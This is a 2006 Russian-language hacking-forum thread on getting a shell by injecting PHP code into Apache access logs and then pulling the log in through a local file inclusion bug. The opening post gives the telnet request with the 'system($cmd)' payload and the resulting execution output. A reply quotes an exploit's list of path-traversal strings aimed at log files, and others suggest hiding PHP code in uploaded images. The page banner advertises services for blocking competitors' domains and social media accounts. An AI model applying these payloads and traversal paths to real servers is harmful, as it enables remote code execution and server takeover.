Форум АНТИЧАТ - Локальный include как способ получть шелл

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Локальный include как способ получть шелл

Опции темы

Поиск в этой теме

Опции просмотра

Локальный include как способ получть шелл

01.09.2006, 18:12

Goudini

Участник форума

Регистрация: 07.06.2006

Сообщений: 146

Провел на форуме:
1652093

Репутация: 490

Отправить сообщение для Goudini с помощью ICQ

Локальный include как способ получть шелл

Получение шела при локальном инклуде

Часто когда находится уязвимость локального инклуда, но паролей от базы данных нет, или есть, но к фтп не подошли, а база пускает только с localhost, дополнительные дыры в скриптах не найдены.... Казалось бы всё пропало, но если есть доступ к файлу журналов Веб-сервера access.log или error.log, можно получить шелл

Запускаем telnet localhost 80

Цитата:

GET <? system($cmd); ?>

Теперь в файле останется запись похожая не эту

Цитата:

127.0.0.1 - - [31/Aug/2006:22:36:29 +0300] "GET <? system($cmd); ?>" 400 414

Как видите всё передалось в чистом виде.
Теперь если к основному скрипту подключить файл логов, то возможно он будет выполнен как php-код
Смотрим.. Вуаля

Цитата:

127.0.0.1 - - [31/Aug/2006:22:36:29 +0300] "GET

Notice: Undefined variable: cmd in \usr\local\apache\logs\access.log on line 1
Warning: system(): Cannot execute a blank command in \usr\local\apache\logs\access.log on line 1

Можем выполнять команды.
Для решения данной уязвимости, нужно разрешить просмотр конфигурационных файлов только пользователю root

Цитата:

chown -R root:root /usr/local/apache
chmod -R o-rwx /usr/local/apache

Последний раз редактировалось Goudini; 01.09.2006 в 18:18..

01.09.2006, 18:16

Utochka

Постоянный

Регистрация: 21.12.2005

Сообщений: 620

Провел на форуме:
1867718

Репутация: 268

интересная идея.
но мне кажется, что редко где файл log обрабатывается как .php

01.09.2006, 20:43

k1b0rg

Тут может быть ваша реклама.

Регистрация: 30.07.2005

Сообщений: 1,243

Провел на форуме:
4520553

Репутация: 1316

да хоть расширение bmp будет, он его обработает как php код.

Действительно идея интересная, но как на практике она работает, хз.

01.09.2006, 21:06

max_pain89

Постоянный

Регистрация: 11.12.2004

Сообщений: 592

Провел на форуме:
2260903

Репутация: 345

способ стар как мир, просто мало о нем кто думает в первую очередь...

уже давно сплойты перебирают всевозможные локации логов.
http://securityreason.com/exploitalert/1100

Цитата:

$paths=array(
"../../../../../../../../../../../../var/log/httpd/access_log",
"../../../../../../../../../../../../var/log/httpd/error_log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../../../../../../apache/logs/error.log",
"../../../../../../apache/logs/access.log",
"../../../../../../../apache/logs/error.log",
"../../../../../../../apache/logs/access.log",
"../../../../../../../../apache/logs/error.log",
"../../../../../../../../apache/logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../../logs/error.log",
"../../../../../../logs/access.log",
"../../../../../../../logs/error.log",
"../../../../../../../logs/access.log",
"../../../../../../../../logs/error.log",
"../../../../../../../../logs/access.log",
"../../../../../../../../../../../../etc/httpd/logs/acces_log",
"../../../../../../../../../../../../etc/httpd/logs/acces.log",
"../../../../../../../../../../../../etc/httpd/logs/error_log",
"../../../../../../../../../../../../etc/httpd/logs/error.log",
"../../../../../../../../../../../../var/www/logs/access_log",
"../../../../../../../../../../../../var/www/logs/access.log",
"../../../../../../../../../../../../usr/local/apache/logs/access_log",
"../../../../../../../../../../../../usr/local/apache/logs/access.log",
"../../../../../../../../../../../../var/log/apache/access_log",
"../../../../../../../../../../../../var/log/apache/access.log",
"../../../../../../../../../../../../var/log/access_log",
"../../../../../../../../../../../../var/www/logs/error_log",
"../../../../../../../../../../../../var/www/logs/error.log",
"../../../../../../../../../../../../usr/local/apache/logs/error_log",
"../../../../../../../../../../../../usr/local/apache/logs/error.log",
"../../../../../../../../../../../../var/log/apache/error_log",
"../../../../../../../../../../../../var/log/apache/error.log",
"../../../../../../../../../../../../var/log/access_log",
"../../../../../../../../../../../../var/log/error_log"
);

часто есть права на чтение /etc/httpd/conf/httpd.conf или /etc/apache/conf/httpd.conf, ну или /etc/apache2/conf/httpd.conf

Парни не забываем, что если еррор лог (или акцесс) больше максимального размера (установленного в настройках пхп) то появится лишь ошибка класса warning

01.09.2006, 21:38

m0nzt3r

ветеран

Регистрация: 22.06.2004

Сообщений: 2,128

Провел на форуме:
5355463

Репутация: 2258

макс_пейн прав..взгляните на сплойты на милворме..особенно от ргод-а.Там тоже перебираюца логи, только у мя никогда не пахало(( много ждал.Почти весь массив перебирал))

__________________

Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze

20.09.2006, 01:18

~~Digimortal~~

Banned

Регистрация: 22.08.2006

Сообщений: 608

Провел на форуме:
6144796

Репутация: 1095

Об этом способе получения шелла не так часто пишут, а в сплоитах он и правда время от времени встречается.
Несколько подробнее про это можно почитать, к примеру, в статье n4n0bit'а вот здесь: _http://hellknights.void.ru/articles/0x48k-phpinclandinjattacks.html

Последний раз редактировалось Digimortal; 20.09.2006 в 01:20..

22.09.2006, 14:35

1ten0.0net1

Time out

Регистрация: 28.11.2005

Сообщений: 547

Провел на форуме:
2320925

Репутация: 1348

Давно читал эту статью в papers на milworm.
P. S. 80% логи не доступны для чтения пользователю под которым запущен веб-сервер.

__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.

22.09.2006, 21:35

~~Sw%00p~~

Banned

Регистрация: 13.04.2006

Сообщений: 65

Провел на форуме:
160575

Репутация: -1

ну одно и тоже если мы пихнём в картинку пхп код и зальём на сервак в галлерею к примеру и через локальный инклуд експлуатируем
а если обычно запускать ну конечно же он будет обрабатываться как обычная картинка или лог файл просто

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Простейший способ взлома мыла	charlie	E-Mail	36	22.06.2005 13:17
еще один способ скачать платную mp3 c сайта mp3search.ru	kOsparow	Комментарии к видео	2	04.03.2005 17:47
Опять ломаем мыло	iRedX	E-Mail	19	27.09.2004 05:40

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход